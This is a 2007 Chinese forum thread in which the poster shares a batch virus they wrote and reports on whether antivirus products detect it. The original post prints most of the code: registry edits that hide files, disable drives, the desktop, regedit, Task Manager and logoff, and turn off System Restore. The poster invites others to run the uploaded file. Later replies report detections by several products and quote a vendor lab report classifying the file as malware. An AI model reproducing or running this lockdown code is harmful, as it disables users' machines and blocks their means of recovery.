红伞的惊奇发现~能杀bat病毒~(有更新)

显示全部楼层 · 发表于 2007-9-20 01:37:07

今天该写了个bat病毒代码~谁知道保存的时候,被红伞监控发现了~好多软件对bat病毒都是没反应的哦~
红伞的表现真的不错`喜爱了那么久`果然值得~~~
大家来看下子哦~偶用的还是中等启发模式~
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer
         \Advanced\Folder\Hidden\SHOWALL /v
         CheckedValue /t REG_DWORD /d 00000000 /f >nul
         REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
         \Explorer /v NoRun /t REG_DWORD /d
         00000001 /f >nul
         REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
         \Explorer /v NoRecentDocsMenu /t
         REG_DWORD /d 00000001 /f >nul
         REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
         \Explorer /v NoDrives /t REG_DWORD /d
         4294967295 /f >nul
         REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
         \System /v Disableregistrytools /t
         REG_DWORD /d 00000002 /f >nul
         REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
         \Explorer /v NoNetHood /t REG_DWORD /d
         00000001 /f >nul
         REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
         \Explorer /V NoDesktop /t REG_DWORD /d
         00000001 /f >nul
         REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
         \Explorer /v NoClose /t REG_DWORD /d
         00000001 /f >nul
         REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
         \Explorer /v NoFind /t REG_DWORD /d
         00000001 /f >nul
         REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
         \System /v DisableTaskMgr /t REG_DWORD
         /d 00000001 /f >nul
         REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
         \Explorer /v NoLogOff /t REG_DWORD /d
         00000001 /f >nul
         REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
         \Explorer /v NoSetTaskBar /t REG_DWORD
         /d 00000001 /f >nul
         REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore
         /v DisableSR /t REG_DWORD /d
         00000001 /f >nul
         REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore
         /v DisableConfig /t REG_DWORD /d
         00000001 /f >nul
         REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
         \Explorer /v RestrictRun /t REG_DWORD /d
         00000001 /f >nul
估计是因为这些改注册表的代码导致了红伞报警吧~
更新:今天又测试了下,居然红伞没有了反映,,,监控扫描都没有了反映....怎么搞的...晕得很.....把编辑好的传上来了 ,勇敢的人测试下看看效果吧...奇怪了 ...红伞昨天的报警难道是冲动?

[ 本帖最后由 sharkvv 于 2007-9-20 13:57 编辑 ]

显示全部楼层 · 发表于 2007-9-20 07:53:53

ok，我测试一下看看

显示全部楼层 · 发表于 2007-9-20 09:56:07

我试了，怎么没反应？

显示全部楼层 · 发表于 2007-9-20 09:57:24

把监控文件设置为全部文件试试看吧

显示全部楼层 · 发表于 2007-9-20 11:58:39

原帖由 周杰伦 于 2007-9-20 09:57 发表
把监控文件设置为全部文件试试看吧

是这样设置么，为什么我还是没有反应呢。

显示全部楼层 · 发表于 2007-9-20 14:43:42

是的，设置正确了
至于为什么没有报警了，我就无法解答了

显示全部楼层 · 发表于 2007-9-20 16:51:31

红伞没报，倒是NOD报了BAT/Agent.X 木马

显示全部楼层 · 发表于 2007-9-20 18:18:34

白高兴喽，瑞星都报了Harm.BAT.KillAV.a 。

[ 本帖最后由 jhtl 于 2007-9-20 18:20 编辑 ]

显示全部楼层 · 发表于 2007-9-21 06:49:13

We received the following archive files:

File ID  Filename  Size (Byte) Result
1315484  1.rar 1.57 KB OK

A listing of files contained inside archives alongside their results can be found below:

File ID  Filename  Size (Byte) Result
1315485  1.bat  9.6 KB  MALWARE

Please find a detailed report concerning each individual sample below:

Filename Result
1.bat  MALWARE

The file '1.bat' has been determined to be 'MALWARE'. Our analysts named the threat BAT/BadGrl.E. The term "BAT/" denotes a virus in a Batch format. Batch file viruses execute commands from the commandline whereby the system can be modified.Detection will be added to our virus definition file (VDF) with one of the next updates.

--------------------------------------------------------------------------------
Please note that you will receive an email which will contain the results shown above. In case the final outcome of the analysis is not yet finished for all files the notification will be sent once ready.

显示全部楼层 · 发表于 2007-9-21 09:56:05

红伞没报，倒是NOD报了BAT/Agent.X 木马
白高兴喽，瑞星都报了Harm.BAT.KillAV.a 。

楼上两位用的.......这下可好了...红伞不报.这两个报了

[砖头] 红伞的惊奇发现~能杀bat病毒~(有更新)

本帖子中包含更多资源

回复 3楼 capsshift 的帖子

本帖子中包含更多资源

回复 5楼 capsshift 的帖子